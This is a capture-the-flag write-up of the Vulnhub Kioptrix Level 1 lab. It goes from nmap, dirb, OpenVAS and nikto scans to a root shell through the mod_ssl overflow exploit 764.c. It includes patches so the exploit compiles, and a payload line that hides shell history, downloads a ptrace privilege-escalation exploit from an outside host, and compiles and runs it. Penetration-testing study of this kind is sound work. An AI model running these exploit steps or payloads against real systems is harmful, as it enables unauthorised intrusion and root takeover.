Kioptrix 1

3 March 2018

Source - Vulnhub Kioptrix Level 1-1

Setting up the challenge

Download VMWare Workstation and the vulnerable VM, start it.

Scanning with nmap

Finding the vulnerable machine

nmap 10.0.1.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 20:02 CET
Nmap scan report for 10.0.1.104
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms
MAC Address: 00:0C:29:BE:28:85 (VMware)

The address is 10.0.1.104.

In depth scan

nmap -A 10.0.1.104


Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 15:15 CET
Nmap scan report for 10.0.1.104
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-02-16T22:42:12+00:00; -15h34m01s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -15h34m01s, deviation: 0s, median: -15h34m01s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 10.0.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.87 seconds

Scan summary

CharacteristicValue
Operating SystemRunning: Linux 2.4.X OS CPE:
Kernelcpe:/o:linux:linux_kernel:2.4
OS detailsLinux 2.4.9 - 2.4.18 (likely embedded)
Samba139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP)
SSHOpenSSH 2.9p2 (protocol 1.99)
ApacheApache/1.3.20 (Unix)

Scanning with dirb

Used to find hidden pages by scanning for common paths.

dirb http://10.0.1.104/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Feb 17 21:49:39 2018
URL_BASE: http://10.0.1.104/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.0.1.104/ ----
+ http://10.0.1.104/~operator (CODE:403|SIZE:273)
+ http://10.0.1.104/~root (CODE:403|SIZE:269)
+ http://10.0.1.104/cgi-bin/ (CODE:403|SIZE:272)
+ http://10.0.1.104/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://10.0.1.104/manual/
==> DIRECTORY: http://10.0.1.104/mrtg/
==> DIRECTORY: http://10.0.1.104/usage/

---- Entering directory: http://10.0.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.1.104/mrtg/ ----
+ http://10.0.1.104/mrtg/index.html (CODE:200|SIZE:17318)

---- Entering directory: http://10.0.1.104/usage/ ----
+ http://10.0.1.104/usage/index.html (CODE:200|SIZE:3704)

-----------------
END_TIME: Sat Feb 17 21:50:04 2018
DOWNLOADED: 13836 - FOUND: 6

Found :

TypeAddressResponse codeResponse size
Filehttp://10.0.1.104/~operator403273
Filehttp://10.0.1.104/~root403269
Filehttp://10.0.1.104/cgi-bin/403272
Filehttp://10.0.1.104/index.html2002890
DIRECTORYhttp://10.0.1.104/manual/
DIRECTORYhttp://10.0.1.104/mrtg/
DIRECTORYhttp://10.0.1.104/usage/

dirb summary

There seems to be the users root and operator.

Scanning with OpenVAS

Install OpenVAS and use it to scan the address.

NVT NamePortPort ProtocolCVSSSeverityCVEs
Webalizer Cross Site Scripting Vulnerability443tcp7.5HighCVE-2001-0835
Webalizer Cross Site Scripting Vulnerability80tcp7.5HighCVE-2001-0835
http TRACE XSS attack443tcp5.8MediumCVE-2004-2320, CVE-2003-1567
http TRACE XSS attack80tcp5.8MediumCVE-2004-2320, CVE-2003-1567
SSL/TLS: Certificate Expired443tcp5MediumNOCVE
SSL/TLS: Report Vulnerable Cipher Suites for HTTPS443tcp5MediumCVE-2016-2183, CVE-2016-6329
Apache UserDir Sensitive Information Disclosure443tcp5MediumCVE-2001-1013
Apache UserDir Sensitive Information Disclosure80tcp5MediumCVE-2001-1013
SSL/TLS: Untrusted Certificate Authorities443tcp5MediumNOCVE
Apache Web Server ETag Header Information Disclosure Weakness443tcp4.3MediumCVE-2003-1418
Apache Web Server ETag Header Information Disclosure Weakness80tcp4.3MediumCVE-2003-1418
SSL/TLS: DHE_EXPORT Man in the Middle Security Bypass Vulnerability (LogJam)443tcp4.3MediumCVE-2015-4000
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE)443tcp4.3MediumCVE-2014-3566
SSL/TLS: Report Weak Cipher Suites443tcp4.3MediumCVE-2013-2566, CVE-2015-2808, CVE-2015-4000
SSH Weak Encryption Algorithms Supported22tcp4.3MediumNOCVE
SSL/TLS: RSA Temporary Key Handling RSA_EXPORT Downgrade Issue (FREAK)443tcp4.3MediumCVE-2015-0204
SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection443tcp4.3MediumCVE-2016-0800, CVE-2014-3566
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability443tcp4.3MediumCVE-2012-0053
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability80tcp4.3MediumCVE-2012-0053
SSL/TLS: Diffie-Hellman Key Exchange Insufficient DH Group Strength Vulnerability443tcp4MediumNOCVE
TCP timestamps2.6LowNOCVE
SSH Weak MAC Algorithms Supported22tcp2.6LowNOCVE

Scanning with nikto

Download or update nikto from GitHub.

./nikto.pl -h  10.0.1.104 -Format csv -o ~/Vulnhub/Kioptrix_1/nikto.csv
PortOSVDBGET/POSTPathDescription
80Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
80OSVDB-0GET/Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 05:12:46 2001
80OSVDB-0GET/The anti-clickjacking X-Frame-Options header is not present.
80OSVDB-0GET/The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
80OSVDB-0GET/The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
80OSVDB-27487GET/Apache is vulnerable to XSS via the Expect header
80OSVDB-0OPTIONS/Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
80OSVDB-877TRACE/HTTP TRACE method is active, suggesting the host is vulnerable to XST
80OSVDB-0GET///etc/hostsThe server install allows reading of any system file by adding an extra '/' to the URL.
80OSVDB-682GET/usage/Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
80OSVDB-3268GET/manual/Directory indexing found.
80OSVDB-3092GET/manual/Web server manual found.
80OSVDB-3268GET/icons/Directory indexing found.
80OSVDB-3233GET/icons/READMEApache default file found.
80OSVDB-3092GET/test.phpThis might be interesting...

Additionnally the following information is being given:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Apache UserDir Sensitive Information Disclosure

The vulnerability listed in OpenVAS is listed as CVE-2001-1013.

Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.

We open msfconsole to search if there are any exploits available :

msfconsole
msf>search CVE-2001-1013

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   auxiliary/scanner/http/apache_userdir_enum                   normal  Apache "mod_userdir" User Enumeration

We use the exploit available

msf> use auxiliary/scanner/http/apache_userdir_enum
msf> show options
msf> set RHOSTS
msf> run
[+] http://10.0.1.104/ - Users found: operator, postgres, root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Conclusion

The system has the users : operator, postgres and root.

mod_ssl buffer overflow

Source : Hypn.za.net One of the popular boot-to-root VMs has an exploit (764.c) which doesn’t compile so well in modern Kali, producing the errors:

764d.c:643:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764d.c:651:2: error: unknown type name ‘RC4_KEY’
764d.c:652:2: error: unknown type name ‘RC4_KEY’
764d.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:845:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764d.c:882:2: error: unknown type name ‘MD5_CTX’
764d.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:977:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764d.c:1069:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764d.c:1106:2: error: unknown type name ‘MD5_CTX’
764d.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764d.c:1127:31: error: expected expression before ‘)’ token
764d.c:1131:32: error: expected expression before ‘)’ token
764d.c:1146:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764d.c:1158:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764d.c:1171:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

Luckily there was a blog post written in 2014 by @paulwebsec explaining how to update the exploit, which fixes some of them but still leaves you with:

764b.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764b.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764b.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764b.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764b.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764b.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764b.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

On Kali (and likely other Debian based distros) you can work around this by simply doing an “apt-get install libssl1.0-dev" to roll back your libssl-dev version, but why don’t we get this compiling with the modern lib…

Then changes to make (including Paul’s) are:

  1. Add this below line 24 (the last #include):
#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16
  1. Replace “COMMAND2" on (now) line 672:
#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
  1. Add “const" to the beginning of (now) line 970:
const unsigned char *p, *end;
  1. Replace the “if" on (now) line 1078 with:
if (EVP_PKEY_get1_RSA(pkey) == NULL) {
  ...}
  1. Replace the “encrypted_key_length" code on (now) line 1084 with:
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
  1. Install “libssl-dev" (if not already installed):
apt–get install libssl–dev
  1. Compile!
gcc -o 764 764.c -lcrypto

Exploiting the overflow

We display the usage with ./764

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./764 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)


  Supported OffSet:
  0x00 - Caldera OpenLinux (apache-1.3.26)
  0x01 - Cobalt Sun 6.0 (apache-1.3.12)
  ...
  0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
  0x0d - Debian GNU Linux (apache_1.3.19-1)
  0x0e - Debian GNU Linux (apache_1.3.22-2)

From the information gathered we exploit the vulnerability with :

./764 0x6b 10.0.1.104 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--22:08:06--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

22:08:07 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 8110
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

From there we have now have a remote shell with root access !